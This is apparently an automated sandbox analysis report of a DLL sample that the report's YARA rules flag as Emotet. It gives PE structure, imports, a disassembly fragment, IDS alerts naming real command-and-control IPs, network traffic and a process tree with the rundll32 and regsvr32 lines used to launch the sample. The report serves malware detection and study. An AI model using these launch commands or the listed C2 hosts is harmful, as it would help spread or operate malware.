                                                                      je 00007FB050749877h
                                                                      cmp esi, 03h
                                                                      jne 00007FB05074989Bh
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05074965Ah
                                                                      test eax, eax
                                                                      jne 00007FB050749875h
                                                                      mov dword ptr [ebp-1Ch], edi
                                                                      cmp dword ptr [ebp-1Ch], edi
                                                                      je 00007FB050749885h
                                                                      mov eax, dword ptr [10050CB4h]
                                                                      cmp eax, edi
                                                                      je 00007FB05074987Ch
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      or dword ptr [ebp-04h], FFFFFFFFh
                                                                      mov eax, dword ptr [ebp-1Ch]
                                                                      jmp 00007FB05074988Ch
                                                                      mov eax, dword ptr [ebp-14h]
                                                                      mov ecx, dword ptr [eax]
                                                                      Programming Language:
                                                                      • [ASM] VS2003 (.NET) build 3077
                                                                      • [ C ] VS2003 (.NET) build 3077
                                                                      • [C++] VS2003 (.NET) build 3077
                                                                      • [EXP] VS2003 (.NET) build 3077
                                                                      • [RES] VS2003 (.NET) build 3077
                                                                      • [LNK] VS2003 (.NET) build 3077
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4aa40 | 0x6e | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x48844 | 0x104 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x51000 | 0x480a0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a000 | 0x4e40 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x43830 | 0x48 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x668 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x487bc | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x3a49e | 0x3b000 | False | 0.6009418034957628 | data | 6.6116392367886405 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x3c000 | 0xeaae | 0xf000 | False | 0.32220052083333334 | data | 5.046533656475497 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x4b000 | 0x5cb8 | 0x3000 | False | 0.2513834635416667 | data | 3.8346109495878085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x51000 | 0x480a0 | 0x49000 | False | 0.5524534460616438 | data | 6.0777904674160155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x9a000 | 0x8810 | 0x9000 | False | 0.3506673177083333 | data | 4.48951519417909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
| --- | --- | --- | --- | --- | --- |
| | 0x747c0 | 0x20800 | data | | |
| RT_CURSOR | 0x95028 | 0x134 | data | | |
| RT_CURSOR | 0x95160 | 0xb4 | data | | |
| RT_CURSOR | 0x95240 | 0x134 | AmigaOS bitmap font | | |
| RT_CURSOR | 0x95390 | 0x134 | data | | |
| RT_CURSOR | 0x954e0 | 0x134 | data | | |
| RT_CURSOR | 0x95630 | 0x134 | data | | |
| RT_CURSOR | 0x95780 | 0x134 | data | | |
| RT_CURSOR | 0x958d0 | 0x134 | data | | |
| RT_CURSOR | 0x95a20 | 0x134 | data | | |
| RT_CURSOR | 0x95b70 | 0x134 | data | | |
| RT_CURSOR | 0x95cc0 | 0x134 | data | | |
| RT_CURSOR | 0x95e10 | 0x134 | data | | |
| RT_CURSOR | 0x95f60 | 0x134 | AmigaOS bitmap font | | |
| RT_CURSOR | 0x960b0 | 0x134 | data | | |
| RT_CURSOR | 0x96200 | 0x134 | data | | |
| RT_CURSOR | 0x96350 | 0x134 | data | | |
| RT_BITMAP | 0x522e0 | 0x428 | data | | |
| RT_BITMAP | 0x520c0 | 0xe0 | GLS_BINARY_LSB_FIRST | Spanish | Mexico |
| RT_BITMAP | 0x965a0 | 0xb8 | data | | |
| RT_BITMAP | 0x96658 | 0x144 | data | | |
| RT_ICON | 0x52a98 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | | |
| RT_ICON | 0x632d8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | | |
| RT_ICON | 0x73b18 | 0x2e8 | data | | |
| RT_ICON | 0x73e00 | 0x128 | GLS_BINARY_LSB_FIRST | | |
| RT_ICON | 0x73f50 | 0x2e8 | data | | |
| RT_ICON | 0x74238 | 0x128 | GLS_BINARY_LSB_FIRST | | |
| RT_ICON | 0x74388 | 0x2e8 | data | | |
| RT_ICON | 0x74670 | 0x128 | GLS_BINARY_LSB_FIRST | | |
| RT_MENU | 0x52728 | 0x23a | data | | |
| RT_MENU | 0x521b0 | 0x46 | data | Spanish | Mexico |
| RT_DIALOG | 0x52968 | 0x12c | data | | |
| RT_DIALOG | 0x521f8 | 0xe2 | data | Spanish | Mexico |
| RT_DIALOG | 0x964a0 | 0xfe | data | | |
| RT_STRING | 0x96810 | 0x92 | data | | |
| RT_STRING | 0x967a0 | 0x6a | data | Spanish | Mexico |
| RT_STRING | 0x968a8 | 0x48 | data | | |
| RT_STRING | 0x96938 | 0x19e | data | | |
| RT_STRING | 0x96c08 | 0x280 | data | | |
| RT_STRING | 0x97010 | 0x39c | data | | |
| RT_STRING | 0x96f90 | 0x7a | data | | |
| RT_STRING | 0x96ad8 | 0x12e | data | | |
| RT_STRING | 0x96e88 | 0x104 | data | | |
| RT_STRING | 0x968f0 | 0x46 | data | | |
| RT_STRING | 0x973b0 | 0x128 | data | | |
| RT_STRING | 0x974d8 | 0x240 | data | | |
| RT_STRING | 0x97718 | 0x9e | data | | |
| RT_STRING | 0x977b8 | 0xb0 | Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952 | | |
| RT_STRING | 0x97868 | 0x30 | data | | |
| RT_STRING | 0x97898 | 0x1d0 | data | | |
| RT_STRING | 0x97a68 | 0x5bc | data | | |
| RT_STRING | 0x98418 | 0x31c | data | | |
| RT_STRING | 0x98118 | 0x300 | data | | |
| RT_STRING | 0x98fa0 | 0xb0 | data | | |
| RT_STRING | 0x98028 | 0xee | data | | |
| RT_STRING | 0x98e50 | 0x11e | data | | |
| RT_STRING | 0x98738 | 0x4d0 | data | | |
| RT_STRING | 0x98c08 | 0x248 | data | | |
| RT_STRING | 0x98f70 | 0x2e | data | | |
| RT_STRING | 0x99050 | 0x4c | data | | |
| RT_ACCELERATOR | 0x94fc0 | 0x68 | data | | |
| RT_GROUP_CURSOR | 0x95218 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | | |
| RT_GROUP_CURSOR | 0x95a08 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95378 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x958b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95768 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x96098 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95618 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95ca8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x954c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95b58 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95df8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x95f48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x961e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x96338 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_CURSOR | 0x96488 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | |
| RT_GROUP_ICON | 0x632c0 | 0x14 | data | | |
| RT_GROUP_ICON | 0x73f28 | 0x22 | data | | |
| RT_GROUP_ICON | 0x73b00 | 0x14 | data | | |
| RT_GROUP_ICON | 0x74360 | 0x22 | data | | |
| RT_GROUP_ICON | 0x74798 | 0x22 | data | | |
| None | 0x52708 | 0x1e | data | | |
| None | 0x521a0 | 0xa | data | Spanish | Mexico |
| DLL | Import |
| --- | --- |
| KERNEL32.dll | RtlUnwind, GetSystemTimeAsFileTime, GetCommandLineA, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualQuery, QueryPerformanceCounter, GetCurrentProcessId, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, GetTickCount, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, GetShortPathNameA, CreateFileA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, FreeResource, SetLastError, GlobalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, ExitProcess, GetStringTypeExA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, UnhandledExceptionFilter, InterlockedExchange |
| USER32.dll | KillTimer, WindowFromPoint, GetDCEx, LockWindowUpdate, RegisterClipboardFormatA, PostThreadMessageA, SetRect, CharNextA, DestroyIcon, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, LoadCursorA, GetSysColorBrush, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, IsZoomed, GetDC, ReleaseDC, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, InvalidateRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, IsChild, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, SetTimer, GetClientRect, GetMenu, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetWindowPos, CharUpperA, UpdateWindow, EnableWindow, SendMessageA, GetClassInfoExA, GetSubMenu, GetMenuItemCount, InsertMenuA, GetMenuItemID, AppendMenuA, SetFocus, ShowWindow, MoveWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, GetMenuItemInfoA, InflateRect, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, MessageBeep, GetNextDlgGroupItem, SetCapture, InvalidateRgn, CopyAcceleratorTableA, GetMenuStringA, GetMenuState, EndDialog, GetNextDlgTabItem, GetParent, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, GetSystemMetrics, SetActiveWindow, GetActiveWindow, GetDesktopWindow, PostQuitMessage, PostMessageA, SetCursor, ShowOwnedPopups, GetLastActivePopup, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, DispatchMessageA |
| GDI32.dll | CreateSolidBrush, CreateFontIndirectA, GetBkColor, GetTextColor, GetStockObject, GetRgnBox, PatBlt, SetRectRgn, CombineRgn, GetMapMode, CreatePatternBrush, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, CreateRectRgnIndirect, GetDeviceCaps, CreateRectRgn, SelectClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetTextExtentPoint32A, GetTextMetricsA, CreateFontA, GetCharWidthA, DeleteObject, SelectObject, StretchDIBits, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetViewportExtEx |
| comdlg32.dll | GetSaveFileNameA, GetFileTitleA, GetOpenFileNameA |
| WINSPOOL.DRV | OpenPrinterA, DocumentPropertiesA, ClosePrinter |
| ADVAPI32.dll | GetFileSecurityA, RegSetValueA, RegOpenKeyA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegCreateKeyA, RegCloseKey, SetFileSecurityA |
| SHELL32.dll | DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragFinish |
| COMCTL32.dll | ImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy |
| SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA |
| oledlg.dll | |
| ole32.dll | CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemFree, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, CoTaskMemAlloc, OleInitialize |
| OLEAUT32.dll | SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString |
| Name | Ordinal | Address |
| --- | --- | --- |
| DllRegisterServer | 1 | 0x10005090 |
| DllUnregisterServerr | 2 | 0x100050c0 |
| Language of compilation system | Country where language is spoken |
| --- | --- |
| Spanish | Mexico |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 07/20/22-01:07:10.809694 | TCP | 2404304 | ET CNC Feodo Tracker Reported CnC Server TCP group 3 | 49822 | 7080 | 192.168.2.5 | 119.193.124.41 |
| 07/20/22-01:07:08.508000 | TCP | 2404338 | ET CNC Feodo Tracker Reported CnC Server TCP group 20 | 49811 | 8080 | 192.168.2.5 | 51.91.76.89 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Jul 20, 2022 01:07:11.353307962 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369446039 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369509935 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369604111 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.626746893 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.898112059 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:12.898277998 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.903048992 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:13.218106985 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:14.065052986 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:14.065643072 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:17.064517021 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:17.064565897 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:17.064661980 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:08:36.268321991 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:08:36.268376112 CEST498227080192.168.2.5119.193.124.41


                                                                      Target ID:0
                                                                      Start time:01:06:21
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll"
                                                                      Imagebase:0xff0000
                                                                      File size:116736 bytes
                                                                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:1
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                                                                      Imagebase:0x1100000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:2
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll
                                                                      Imagebase:0x8f0000
                                                                      File size:20992 bytes
                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Target ID:3
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Target ID:4
                                                                      Start time:01:06:23
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Target ID:5
                                                                      Start time:01:06:26
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che"
                                                                      Imagebase:0x8f0000
                                                                      File size:20992 bytes
                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Target ID:6
                                                                      Start time:01:06:27
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:12
                                                                      Start time:01:06:47
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:13
                                                                      Start time:01:06:51
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:14
                                                                      Start time:01:07:04
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:16
                                                                      Start time:01:07:10
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:22
                                                                      Start time:01:07:41
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:24
                                                                      Start time:01:07:51
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language


                                                                        Execution Graph

                                                                        Execution Coverage:4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:3.2%
                                                                        Total number of Nodes:1001
                                                                        Total number of Limit Nodes:22
